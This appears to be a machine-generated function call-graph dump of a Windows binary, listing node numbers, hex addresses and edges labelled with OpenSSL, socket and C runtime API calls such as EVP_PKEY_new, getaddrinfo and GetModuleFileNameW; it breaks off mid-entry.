7ffda3611045 EVP_SIGNATURE_free 105150->105151 105152 7ffda361103c 105150->105152 105153 7ffda361104d ERR_pop_to_mark EVP_PKEY_asn1_find_str 105151->105153 105152->105153 105154 7ffda36110af EVP_PKEY_asn1_get0_info 105153->105154 105155 7ffda36110ce 105153->105155 105154->105155 105156 7ffda36110fc EVP_PKEY_asn1_find_str 105155->105156 105157 7ffda361111f EVP_PKEY_asn1_get0_info 105156->105157 105158 7ffda361113e 105156->105158 105157->105158 105159 7ffda361116f EVP_PKEY_asn1_find_str 105158->105159 105160 7ffda3611192 EVP_PKEY_asn1_get0_info 105159->105160 105161 7ffda36111b1 105159->105161 105160->105161 105162 7ffda36111e2 EVP_PKEY_asn1_find_str 105161->105162 105163 7ffda3611205 EVP_PKEY_asn1_get0_info 105162->105163 105164 7ffda3611224 105162->105164 105163->105164 105165 7ffda3611255 EVP_PKEY_asn1_find_str 105164->105165 105166 7ffda3611278 EVP_PKEY_asn1_get0_info 105165->105166 105168 7ffda3611297 105165->105168 105166->105168 105167 7ffda36112b4 EVP_PKEY_asn1_find_str 105169 7ffda36112d7 EVP_PKEY_asn1_get0_info 105167->105169 105170 7ffda36112f6 105167->105170 105168->105167 105169->105170 105171 7ffda3611313 EVP_PKEY_asn1_find_str 105170->105171 105172 7ffda3611336 EVP_PKEY_asn1_get0_info 105171->105172 105173 7ffda3611355 105171->105173 105172->105173 105173->105066 105175 7ffda368edf0 105174->105175 105176 7ffda3629f45 OSSL_PROVIDER_do_all 105175->105176 105177 7ffda362a00a 105176->105177 105180 7ffda3629f76 105176->105180 105280 7ffda368ee50 105177->105280 105180->105177 105181 7ffda3629fce CRYPTO_malloc 105180->105181 105181->105177 105182 7ffda3629ff3 memcpy 105181->105182 105182->105177 105184 7ffda368edf0 105183->105184 105185 7ffda362a03c OSSL_PROVIDER_do_all 105184->105185 105186 7ffda362a120 105185->105186 105187 7ffda362a05c 105185->105187 105186->105075 105188 7ffda362a06a CRYPTO_free CRYPTO_zalloc 105187->105188 105191 7ffda362a106 105187->105191 105188->105186 105189 7ffda362a0ac 105188->105189 105190 7ffda362a0d0 OBJ_txt2nid 105189->105190 105189->105191 105190->105190 105190->105191 105191->105075 105193 7ffda368edf0 105192->105193 105194 7ffda362a8c2 EVP_PKEY_new 105193->105194 105195 7ffda362a8ee CRYPTO_malloc 105194->105195 105196 7ffda362ab54 CRYPTO_free CRYPTO_free EVP_PKEY_free 105194->105196 105197 7ffda362a931 105195->105197 105198 7ffda362ab4c 105195->105198 105196->105079 105197->105198 105199 7ffda362a93a CRYPTO_malloc 105197->105199 105198->105196 105199->105198 105200 7ffda362a964 ERR_set_mark 105199->105200 105204 7ffda362a9b0 105200->105204 105201 7ffda362a9e4 EVP_PKEY_set_type 105202 7ffda362a9f7 EVP_PKEY_CTX_new_from_pkey 105201->105202 105201->105204 105203 7ffda362aa10 EVP_PKEY_CTX_free 105202->105203 105202->105204 105203->105204 105204->105201 105204->105203 105206 7ffda362aa2a 105204->105206 105205 7ffda362aafd ERR_pop_to_mark 105205->105198 105206->105205 105207 7ffda362aa9a OBJ_txt2nid 105206->105207 105208 7ffda362aaac OBJ_txt2nid OBJ_txt2nid 105206->105208 105207->105206 105208->105206 105209 7ffda362aaf5 105208->105209 105209->105205 105211 7ffda360e910 105210->105211 105291 7ffda360edf0 105211->105291 105213 7ffda360e91e 105214 7ffda360e93d 105213->105214 105300 7ffda3611430 12 API calls 105213->105300 105214->105084 105214->105085 105217 7ffda360d370 105216->105217 105218 7ffda360d3d2 105217->105218 105219 7ffda360d37c CRYPTO_zalloc 105217->105219 105218->105087 105219->105218 105220 7ffda360d398 CRYPTO_zalloc 105219->105220 105221 7ffda360d3df 105220->105221 105222 7ffda360d3bf CRYPTO_free 105220->105222 105221->105087 105222->105218 105225 7ffda36102da 105223->105225 105224 7ffda36108ed 105224->105092 105224->105093 105225->105224 105301 7ffda360ea30 7 API calls 105225->105301 105227 7ffda361032e 105227->105224 105228 7ffda3610370 CRYPTO_malloc 105227->105228 105231 7ffda3610395 105227->105231 105228->105224 105228->105231 105230 7ffda36108d4 105232 7ffda36108d8 CRYPTO_free 105230->105232 105234 7ffda3610903 CRYPTO_malloc 105230->105234 105302 7ffda3610130 CRYPTO_zalloc CRYPTO_free 105231->105302 105232->105224 105235 7ffda3610b35 strncmp 105234->105235 105237 7ffda3610c5a 105235->105237 105238 7ffda3610c3c 105235->105238 105239 7ffda3610c93 CRYPTO_free 105237->105239 105304 7ffda360fbb0 13 API calls 105237->105304 105303 7ffda360fbb0 13 API calls 105238->105303 105242 7ffda3610cad 105239->105242 105243 7ffda3610cb8 OPENSSL_sk_new_null 105239->105243 105242->105243 105245 7ffda3610cd0 OPENSSL_sk_num 105243->105245 105246 7ffda3610cc5 105243->105246 105244 7ffda3610c90 105244->105239 105247 7ffda3610d5a 105245->105247 105248 7ffda3610cdc 105245->105248 105246->105245 105250 7ffda3610d82 CRYPTO_free OPENSSL_sk_dup 105247->105250 105252 7ffda3610d6a OPENSSL_sk_push 105247->105252 105249 7ffda3610cf0 OPENSSL_sk_value 105248->105249 105251 7ffda3610d40 OPENSSL_sk_delete 105248->105251 105255 7ffda3610d0f OPENSSL_sk_push 105248->105255 105249->105248 105249->105251 105253 7ffda3610d33 OPENSSL_sk_free 105250->105253 105254 7ffda3610da7 OPENSSL_sk_free OPENSSL_sk_set_cmp_func OPENSSL_sk_sort OPENSSL_sk_free 105250->105254 105256 7ffda3610d4c OPENSSL_sk_num 105251->105256 105252->105247 105257 7ffda3610d1e CRYPTO_free 105252->105257 105253->105224 105254->105224 105255->105256 105255->105257 105256->105247 105256->105249 105257->105253 105260 7ffda361ef35 105259->105260 105305 7ffda3633f90 105260->105305 105262 7ffda361ef47 105263 7ffda3614676 105262->105263 105264 7ffda361ef4c ERR_set_mark OBJ_nid2sn EVP_MD_fetch ERR_pop_to_mark 105262->105264 105263->105099 105264->105263 105265->105112 105266->105119 105267->105119 105269 7ffda360bffa CRYPTO_THREAD_run_once 105268->105269 105269->105135 105271 7ffda361ee55 105270->105271 105276 7ffda3633f40 105271->105276 105273 7ffda361ee67 105274 7ffda361ee91 105273->105274 105275 7ffda361ee6c ERR_set_mark OBJ_nid2sn EVP_CIPHER_fetch ERR_pop_to_mark 105273->105275 105274->105138 105275->105274 105277 7ffda3633f50 105276->105277 105278 7ffda3633f85 105277->105278 105279 7ffda3633f6c ENGINE_finish 105277->105279 105278->105273 105279->105273 105281 7ffda368ee59 105280->105281 105282 7ffda3614578 105281->105282 105283 7ffda368eea4 IsProcessorFeaturePresent 105281->105283 105282->105072 105282->105073 105284 7ffda368eebc 105283->105284 105289 7ffda368f098 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 105284->105289 105286 7ffda368eecf 105290 7ffda368ee70 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 105286->105290 105289->105286 105292 7ffda368edf0 105291->105292 105293 7ffda360ee05 OPENSSL_sk_new_null 105292->105293 105294 7ffda360ee83 105293->105294 105295 7ffda360ee1b 105293->105295 105294->105213 105296 7ffda360ee20 CONF_parse_list 105295->105296 105297 7ffda360ee95 OPENSSL_sk_free 105295->105297 105298 7ffda360ee4d ERR_new ERR_set_debug ERR_set_error OPENSSL_sk_free 105296->105298 105299 7ffda360ee41 OPENSSL_sk_num 105296->105299 105297->105213 105298->105294 105299->105297 105299->105298 105300->105214 105301->105227 105302->105230 105303->105237 105304->105244 105306 7ffda3633fa0 105305->105306 105307 7ffda3633fd5 105306->105307 105308 7ffda3633fbc ENGINE_finish 105306->105308 105307->105262 105308->105262 105309 7ffda376623e 105310 7ffda3766250 105309->105310 105313 7ffda3781530 105310->105313 105312 7ffda37660d8 105314 7ffda378155e 105313->105314 105323 7ffda3782780 105314->105323 105316 7ffda378156e 105317 7ffda377f210 2 API calls 105316->105317 105319 7ffda3781587 105316->105319 105318 7ffda37815d8 105317->105318 105318->105319 105320 7ffda37815eb 105318->105320 105319->105312 105346 7ffda373b3d0 calloc free free 105320->105346 105322 7ffda3781605 105322->105319 105324 7ffda37827cf 105323->105324 105344 7ffda37827f1 105324->105344 105347 7ffda3782360 calloc 105324->105347 105326 7ffda3782803 105327 7ffda378284c 105326->105327 105328 7ffda378283a _strdup 105326->105328 105326->105344 105329 7ffda378286a 105327->105329 105330 7ffda3782858 _strdup 105327->105330 105328->105327 105328->105344 105331 7ffda3782876 _strdup 105329->105331 105332 7ffda3782888 105329->105332 105330->105329 105330->105344 105331->105332 105331->105344 105333 7ffda3782970 _strdup 105332->105333 105334 7ffda3782986 105332->105334 105332->105344 105333->105334 105333->105344 105335 7ffda378298f _strdup 105334->105335 105336 7ffda37829ae 105334->105336 105335->105336 105337 7ffda377f210 2 API calls 105336->105337 105336->105344 105342 7ffda3782bcb 105337->105342 105338 7ffda3782d9f 105340 7ffda3782db4 free free free free 105338->105340 105341 7ffda3782e58 free free free 105338->105341 105339 7ffda3782d4d free free 105339->105338 105340->105341 105343 7ffda3782eea 105341->105343 105342->105338 105342->105339 105342->105343 105343->105344 105355 7ffda3784cc0 105343->105355 105344->105316 105346->105322 105348 7ffda3782389 105347->105348 105349 7ffda3782508 105347->105349 105350 7ffda377f210 2 API calls 105348->105350 105349->105326 105351 7ffda37823e8 105350->105351 105352 7ffda3782539 105351->105352 105353 7ffda37824e5 _strdup 105351->105353 105352->105326 105353->105352 105354 7ffda37824f7 free free 105353->105354 105354->105349 105356 7ffda3784f30 calloc 105355->105356 105357 7ffda3784ceb 105355->105357 105362 7ffda3784f57 105356->105362 105358 7ffda3784d1f 105357->105358 105359 7ffda3784cf7 strncmp 105357->105359 105361 7ffda3784d45 105358->105361 105366 7ffda3784e0e 105358->105366 105359->105358 105360 7ffda3784d0e 105359->105360 105360->105356 105360->105358 105364 7ffda3784d4a _strdup 105361->105364 105363 7ffda3784fbf 105362->105363 105365 7ffda3784f9c free 105362->105365 105368 7ffda3784d77 105364->105368 105365->105363 105367 7ffda3784e33 _strdup 105366->105367 105367->105368 105369 7ffda3784e60 105367->105369 105368->105344 105369->105368 105370 7ffda377f210 2 API calls 105369->105370 105370->105368 105371 7ffda36d4e55 105376 7ffda36d3350 105371->105376 105373 7ffda36d4e8b 105375 7ffda36d4ea4 105373->105375 105386 7ffda36d67a0 105373->105386 105394 7ffda36da090 105376->105394 105378 7ffda36d336a 105378->105373 105381 7ffda36d3380 105382 7ffda36d3398 105381->105382 105419 7ffda36d6ae0 105381->105419 105382->105373 105387 7ffda36d67db 105386->105387 105391 7ffda36d6805 105386->105391 105389 7ffda36d6801 105387->105389 105387->105391 105642 7ffda36da920 31 API calls Concurrency::details::SchedulerProxy::DeleteThis 105387->105642 105390 7ffda36d685f _time64 105389->105390 105389->105391 105393 7ffda36d34c0 27 API calls 105389->105393 105636 7ffda36e2930 105389->105636 105390->105389 105391->105375 105393->105389 105395 7ffda36da0b4 WSAStartup 105394->105395 105396 7ffda36da0cf WSASetLastError malloc 105394->105396 105397 7ffda36da0c8 105395->105397 105405 7ffda36da0ea 105395->105405 105398 7ffda36da0f1 memset malloc malloc malloc 105396->105398 105396->105405 105397->105396 105567 7ffda36ebca0 malloc 105398->105567 105403 7ffda36ebca0 malloc 105406 7ffda36da1dd 105403->105406 105569 7ffda36f6230 105405->105569 105406->105405 105578 7ffda36d9330 53 API calls Concurrency::details::SchedulerProxy::DeleteThis 105406->105578 105407 7ffda36d6a20 105581 7ffda36da810 199 API calls 105407->105581 105409 7ffda36d6a42 105410 7ffda36d6a4a 105409->105410 105582 7ffda36d9240 29 API calls Concurrency::details::SchedulerProxy::DeleteThis 105409->105582 105410->105381 105412 7ffda36d6a6a 105413 7ffda36d6aac 105412->105413 105414 7ffda36d6a6e 105412->105414 105415 7ffda36d6aca free 105413->105415 105416 7ffda36d6ab5 free 105413->105416 105417 7ffda36d6a96 free 105414->105417 105418 7ffda36d6a81 free 105414->105418 105415->105381 105416->105415 105416->105416 105417->105381 105418->105417 105418->105418 105422 7ffda36d6b10 calloc 105419->105422 105421 7ffda36d77e5 105616 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105421->105616 105422->105421 105434 7ffda36d6bc6 105422->105434 105424 7ffda36d6da0 105427 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105424->105427 105425 7ffda36d6d50 105583 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105425->105583 105426 7ffda36d6f97 105431 7ffda36d7009 free 105426->105431 105438 7ffda36d701b 105426->105438 105435 7ffda36d338c 105427->105435 105428 7ffda36d6e2a free 105443 7ffda36d6da5 105428->105443 105429 7ffda36d6f2f 105442 7ffda36d6f9e 105429->105442 105449 7ffda36d6f99 105429->105449 105450 7ffda36d6f3d 105429->105450 105585 7ffda36d2860 30 API calls Concurrency::details::SchedulerProxy::DeleteThis 105431->105585 105432 7ffda36d6d4b 105432->105425 105432->105443 105433 7ffda36d6c13 malloc 105436 7ffda36d6c46 105433->105436 105437 7ffda36d6c33 memcpy 105433->105437 105434->105433 105441 7ffda36d6c7d 105434->105441 105435->105382 105557 7ffda36d68e0 105435->105557 105436->105421 105436->105434 105436->105441 105437->105436 105438->105424 105447 7ffda36d703e free _strdup 105438->105447 105453 7ffda36d705b 105438->105453 105440 7ffda36d6cd2 malloc 105445 7ffda36d6d0b 105440->105445 105446 7ffda36d6cf8 memcpy 105440->105446 105441->105425 105441->105432 105441->105440 105441->105443 105584 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105442->105584 105443->105428 105444 7ffda36d6e54 _strdup 105443->105444 105451 7ffda36d6dff isalpha 105443->105451 105454 7ffda36d6e7d 105443->105454 105444->105421 105444->105443 105445->105421 105445->105441 105457 7ffda36d6d44 105445->105457 105446->105445 105447->105421 105447->105453 105448 7ffda36d6ec3 malloc 105455 7ffda36d6ef6 105448->105455 105456 7ffda36d6ee3 memcpy 105448->105456 105449->105426 105449->105442 105450->105426 105458 7ffda36d6f60 _strdup 105450->105458 105451->105443 105459 7ffda36d707f memset SHGetFolderPathA 105453->105459 105464 7ffda36d7190 105453->105464 105472 7ffda36d7119 105453->105472 105454->105426 105454->105429 105454->105448 105455->105421 105455->105429 105455->105454 105456->105455 105457->105425 105457->105432 105458->105421 105458->105450 105461 7ffda36d70b1 105459->105461 105459->105472 105460 7ffda36d73b6 105462 7ffda36d74c9 _strdup 105460->105462 105477 7ffda36d73d8 105460->105477 105586 7ffda36f1830 105461->105586 105462->105421 105465 7ffda36d73f5 105462->105465 105464->105460 105467 7ffda36d71df malloc 105464->105467 105470 7ffda36d75c1 _strdup 105465->105470 105487 7ffda36d74fd 105465->105487 105467->105421 105469 7ffda36d7203 memcpy 105467->105469 105468 7ffda36d70f1 105471 7ffda36f1830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 105468->105471 105532 7ffda36d722a 105469->105532 105470->105421 105478 7ffda36d7514 105470->105478 105471->105472 105472->105464 105589 7ffda36da9f0 95 API calls Concurrency::details::SchedulerProxy::DeleteThis 105472->105589 105473 7ffda36d73fa 105590 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105473->105590 105474 7ffda36d7264 strcmp 105474->105532 105476 7ffda36d74a7 105592 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105476->105592 105477->105465 105477->105476 105481 7ffda36d7615 strcmp 105478->105481 105486 7ffda36d7646 105478->105486 105485 7ffda36d7628 105481->105485 105481->105486 105482 7ffda36d77e1 105482->105421 105484 7ffda36d7889 _strdup 105482->105484 105511 7ffda36d7808 105482->105511 105483 7ffda36d7413 free 105483->105424 105484->105421 105492 7ffda36d7825 105484->105492 105594 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105485->105594 105488 7ffda36d76e3 105486->105488 105595 7ffda36f39e0 isupper tolower isupper tolower 105486->105595 105487->105478 105497 7ffda36d7576 strcmp 105487->105497 105493 7ffda36d7779 105488->105493 105600 7ffda36f39e0 isupper tolower isupper tolower 105488->105600 105489 7ffda36d739f free 105489->105460 105489->105464 105496 7ffda36d7975 _strdup 105492->105496 105519 7ffda36d78b6 105492->105519 105493->105482 105493->105493 105605 7ffda36f39e0 isupper tolower isupper tolower 105493->105605 105495 7ffda36d767d 105495->105488 105596 7ffda36f39e0 isupper tolower isupper tolower 105495->105596 105496->105421 105501 7ffda36d798e 105496->105501 105497->105478 105498 7ffda36d7589 strcmp 105497->105498 105498->105478 105502 7ffda36d759c 105498->105502 105499 7ffda36d72fa strcmp 105499->105532 105500 7ffda36d7713 105500->105493 105601 7ffda36f39e0 isupper tolower isupper tolower 105500->105601 105509 7ffda36d7a01 strcmp 105501->105509 105530 7ffda36d79c3 105501->105530 105593 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105502->105593 105506 7ffda36d7690 105506->105488 105597 7ffda36f39e0 isupper tolower isupper tolower 105506->105597 105507 7ffda36d7726 105507->105493 105602 7ffda36f39e0 isupper tolower isupper tolower 105507->105602 105508 7ffda36d742a 105591 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105508->105591 105514 7ffda36d7a1d strcmp 105509->105514 105509->105530 105510 7ffda36d7867 105608 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105510->105608 105511->105492 105511->105510 105514->105530 105539 7ffda36d7a3c 105514->105539 105516 7ffda36d77bf 105516->105482 105606 7ffda36f39e0 isupper tolower isupper tolower 105516->105606 105518 7ffda36d7953 105610 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105518->105610 105519->105518 105520 7ffda36d78d5 105519->105520 105520->105501 105524 7ffda36d7935 105520->105524 105522 7ffda36d76a3 105522->105488 105598 7ffda36f39e0 isupper tolower isupper tolower 105522->105598 105523 7ffda36d744a free 105523->105424 105609 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105524->105609 105526 7ffda36d7739 105526->105493 105603 7ffda36f39e0 isupper tolower isupper tolower 105526->105603 105527 7ffda36d79f9 105556 7ffda36d7b79 105527->105556 105612 7ffda36f1750 RAND_bytes 105527->105612 105530->105527 105531 7ffda36d7c0d 105530->105531 105530->105556 105614 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105531->105614 105532->105473 105532->105474 105532->105489 105532->105499 105532->105508 105534 7ffda36d77d2 105534->105421 105607 7ffda36f39e0 isupper tolower isupper tolower 105534->105607 105535 7ffda36d7c65 free 105615 7ffda36f4980 39 API calls Concurrency::details::SchedulerProxy::DeleteThis 105535->105615 105538 7ffda36d76b6 105538->105488 105544 7ffda36d76ba 105538->105544 105539->105530 105545 7ffda36d7aa2 strcmp 105539->105545 105543 7ffda36d774c 105543->105493 105549 7ffda36d7750 105543->105549 105599 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105544->105599 105545->105530 105546 7ffda36d7ac4 105545->105546 105611 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105546->105611 105547 7ffda36d7c74 105553 7ffda36d7c7b _strdup 105547->105553 105548 7ffda36d7b31 105548->105556 105613 7ffda36f32e0 GetSystemTimePreciseAsFileTime 105548->105613 105604 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105549->105604 105553->105421 105553->105424 105555 7ffda36d7b51 _getpid 105555->105556 105556->105424 105556->105535 105558 7ffda36d691d 105557->105558 105560 7ffda36d68ee 105557->105560 105558->105382 105561 7ffda36d692f 105560->105561 105562 7ffda36d6900 105560->105562 105565 7ffda36d6913 105560->105565 105627 7ffda36d34c0 105561->105627 105633 7ffda36ec210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 105562->105633 105566 7ffda36d6981 105565->105566 105634 7ffda36d63c0 10 API calls 105565->105634 105566->105382 105568 7ffda36da1ce 105567->105568 105568->105403 105570 7ffda36f6239 105569->105570 105571 7ffda36d3362 105570->105571 105572 7ffda36f6664 IsProcessorFeaturePresent 105570->105572 105571->105378 105571->105407 105573 7ffda36f667c 105572->105573 105579 7ffda36f6968 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 105573->105579 105575 7ffda36f668f 105580 7ffda36f6630 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 105575->105580 105579->105575 105581->105409 105582->105412 105583->105424 105584->105424 105585->105438 105617 7ffda36f1db0 _errno 105586->105617 105589->105472 105590->105483 105591->105523 105592->105424 105593->105424 105594->105424 105595->105495 105596->105506 105597->105522 105598->105538 105599->105424 105600->105500 105601->105507 105602->105526 105603->105543 105604->105424 105605->105516 105606->105534 105607->105482 105608->105424 105609->105424 105610->105424 105611->105424 105612->105548 105613->105555 105614->105424 105615->105547 105616->105424 105618 7ffda36f240f 105617->105618 105621 7ffda36f1df7 105617->105621 105619 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105618->105619 105620 7ffda36d70cf free malloc 105619->105620 105620->105421 105620->105468 105621->105621 105623 7ffda36f1e46 105621->105623 105625 7ffda36f1ec3 _errno 105621->105625 105623->105618 105623->105621 105624 7ffda36f2670 fwrite fwrite Concurrency::details::SchedulerProxy::DeleteThis 105623->105624 105626 7ffda36f23fc 105623->105626 105624->105623 105625->105618 105626->105618 105629 7ffda36d3525 105627->105629 105632 7ffda36d4dae 105627->105632 105628 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105630 7ffda36d4dc9 105628->105630 105635 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105629->105635 105630->105565 105632->105628 105633->105565 105634->105558 105635->105632 105643 7ffda36e3290 33 API calls Concurrency::details::SchedulerProxy::DeleteThis 105636->105643 105638 7ffda36e2946 105639 7ffda36e294a 105638->105639 105644 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105638->105644 105639->105389 105641 7ffda36e2966 105641->105389 105642->105389 105643->105638 105644->105641 105645 7ffda36d4218 105646 7ffda36d4231 105645->105646 105647 7ffda36d4a9a 105646->105647 105649 7ffda36d425d 105646->105649 105674 7ffda36d48a3 105646->105674 105733 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105647->105733 105713 7ffda36e20a0 105649->105713 105650 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 105652 7ffda36d4dc9 105650->105652 105653 7ffda36d4285 105655 7ffda36d42e2 105653->105655 105656 7ffda36d4a7f 105653->105656 105671 7ffda36d428f 105653->105671 105658 7ffda36d42eb 105655->105658 105659 7ffda36d4434 105655->105659 105732 7ffda36e1de0 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 105656->105732 105657 7ffda36d49d9 105729 7ffda36e1fb0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 105657->105729 105722 7ffda36e52a0 58 API calls Concurrency::details::SchedulerProxy::DeleteThis 105658->105722 105661 7ffda36d4a56 105659->105661 105662 7ffda36d443d 105659->105662 105731 7ffda36e5920 50 API calls Concurrency::details::SchedulerProxy::DeleteThis 105661->105731 105666 7ffda36e20a0 32 API calls 105662->105666 105670 7ffda36d4456 105666->105670 105667 7ffda36d42f5 105667->105671 105685 7ffda36d42fd 105667->105685 105669 7ffda36d49f6 105669->105671 105672 7ffda36d4a1f 105669->105672 105670->105671 105673 7ffda36d445e 105670->105673 105671->105674 105735 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105671->105735 105672->105674 105730 7ffda36ec280 free realloc free Concurrency::details::SchedulerProxy::DeleteThis 105672->105730 105724 7ffda36d2330 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105673->105724 105674->105650 105677 7ffda36d4475 105677->105674 105725 7ffda36e2880 fflush 105677->105725 105679 7ffda36d3b13 105681 7ffda36d3b83 105679->105681 105719 7ffda36d63c0 10 API calls 105679->105719 105680 7ffda36d361d free 105712 7ffda36d357a 105680->105712 105683 7ffda36d3bb2 105681->105683 105684 7ffda36d4d8e 105681->105684 105726 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105683->105726 105734 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105684->105734 105685->105712 105723 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105685->105723 105686 7ffda36d3b61 105720 7ffda36dae50 free free free free 105686->105720 105687 7ffda36d3662 memset 105687->105712 105692 7ffda36d3b69 105721 7ffda36de5f0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 105692->105721 105693 7ffda36d36a3 _errno strtol 105693->105683 105696 7ffda36d36ce _errno 105693->105696 105695 7ffda36f1830 12 API calls Concurrency::details::SchedulerProxy::DeleteThis 105695->105712 105696->105683 105696->105712 105697 7ffda36d36f0 isspace 105697->105712 105698 7ffda36d3911 calloc 105700 7ffda36d48a8 105698->105700 105701 7ffda36d392f 105698->105701 105699 7ffda36d3852 105699->105698 105699->105699 105727 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105700->105727 105702 7ffda36d3998 105701->105702 105704 7ffda36d3940 memcpy 105701->105704 105718 7ffda36ee290 free free freeaddrinfo 105702->105718 105704->105702 105704->105704 105705 7ffda36d48b7 105728 7ffda36ee290 free free freeaddrinfo 105705->105728 105707 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 105707->105712 105709 7ffda36ee100 calloc calloc free getaddrinfo 105709->105712 105710 7ffda36d48c4 105710->105674 105711 7ffda36d39a5 105711->105679 105712->105674 105712->105679 105712->105680 105712->105683 105712->105687 105712->105693 105712->105695 105712->105697 105712->105699 105712->105707 105712->105709 105714 7ffda36e20ad 105713->105714 105717 7ffda36d426f 105713->105717 105715 7ffda36e20b3 105714->105715 105714->105717 105736 7ffda36de7c0 32 API calls Concurrency::details::SchedulerProxy::DeleteThis 105715->105736 105717->105653 105717->105657 105717->105674 105718->105711 105719->105686 105720->105692 105721->105681 105722->105667 105723->105712 105724->105677 105725->105712 105726->105674 105727->105705 105728->105710 105729->105669 105730->105674 105731->105671 105732->105674 105733->105674 105734->105674 105735->105674 105736->105717 105737 7ffda3751ac0 105742 7ffda3751b10 105737->105742 105738 7ffda3751c28 inet_pton 105740 7ffda3751c46 inet_pton 105738->105740 105746 7ffda3751c40 105738->105746 105739 7ffda3751b53 105741 7ffda3751ce7 105740->105741 105740->105746 105743 7ffda3751460 2 API calls 105741->105743 105747 7ffda3751d08 105741->105747 105742->105738 105742->105739 105743->105747 105744 7ffda3751deb htons inet_pton 105745 7ffda3751e2c calloc 105744->105745 105754 7ffda3751d7c 105744->105754 105750 7ffda3751e51 calloc 105745->105750 105759 7ffda3751e49 105745->105759 105746->105739 105762 7ffda37523f0 inet_pton inet_pton inet_ntop SimpleString::operator= 105746->105762 105747->105739 105747->105744 105747->105754 105749 7ffda3751f83 105749->105739 105751 7ffda3751f9b 105749->105751 105757 7ffda3751fa2 105749->105757 105756 7ffda3751ed4 htons inet_pton 105750->105756 105750->105759 105760 7ffda3744310 memset calloc memmove htons free 105751->105760 105754->105739 105754->105746 105754->105749 105755 7ffda3751fa0 105755->105757 105756->105759 105757->105739 105761 7ffda37523f0 inet_pton inet_pton inet_ntop SimpleString::operator= 105757->105761 105759->105754 105759->105759 105760->105755 105761->105739 105762->105739 105763 7ffd946ba950 105797 7ffd94749d10 105763->105797 105765 7ffd946ba99d GetModuleHandleExW 105766 7ffd946ba9d8 GetModuleFileNameW 105765->105766 105767 7ffd946ba9bd 105765->105767 105766->105767 105768 7ffd946ba9f1 105766->105768 105814 7ffd9471a510 8 API calls 2 library calls 105767->105814 105798 7ffd94698f40 104 API calls 5 library calls 105768->105798 105770 7ffd946baba4 105772 7ffd946baa26 105780 7ffd946babe8 105772->105780 105792 7ffd946baa30 105772->105792 105773 7ffd946bac91 105774 7ffd946badbb 105773->105774 105781 7ffd946baca1 105773->105781 105775 7ffd946964f0 104 API calls 105774->105775 105794 7ffd946bab0c 105774->105794 105775->105794 105776 7ffd946bab8d 105776->105767 105778 7ffd946bac83 105783 7ffd946964f0 104 API calls 105778->105783 105779 7ffd946bae2e 105817 7ffd947297f4 102 API calls _invalid_parameter_noinfo_noreturn 105779->105817 105780->105773 105815 7ffd94698f40 104 API calls 5 library calls 105780->105815 105816 7ffd94698f40 104 API calls 5 library calls 105781->105816 105783->105773 105784 7ffd946bad66 105788 7ffd946964f0 104 API calls 105784->105788 105787 7ffd946bae33 105818 7ffd947297f4 102 API calls _invalid_parameter_noinfo_noreturn 105787->105818 105788->105794 105789 7ffd946baafe 105800 7ffd946964f0 105789->105800 105799 7ffd94698f40 104 API calls 5 library calls 105792->105799 105794->105767 105794->105776 105794->105779 105794->105787 105797->105765 105798->105772 105799->105789 105801 7ffd9469651e 105800->105801 105805 7ffd946965d4 105801->105805 105806 7ffd94696613 105801->105806 105807 7ffd946965ad 105801->105807 105809 7ffd9469653a ctype 105801->105809 105813 7ffd9469660d 105801->105813 105808 7ffd9471a538 std::_Facet_Register 104 API calls 105805->105808 105830 7ffd94692c50 104 API calls std::_Throw_Cpp_error 105806->105830 105807->105813 105819 7ffd9471a538 105807->105819 105808->105809 105809->105794 105811 7ffd946965be 105811->105809 105828 7ffd947297f4 102 API calls _invalid_parameter_noinfo_noreturn 105811->105828 105829 7ffd94692b80 104 API calls 2 library calls 105813->105829 105814->105770 105815->105778 105816->105784 105820 7ffd9471a543 105819->105820 105821 7ffd9471a55c 105820->105821 105823 7ffd9471a562 105820->105823 105831 7ffd94735790 105820->105831 105821->105811 105824 7ffd9471a56d 105823->105824 105834 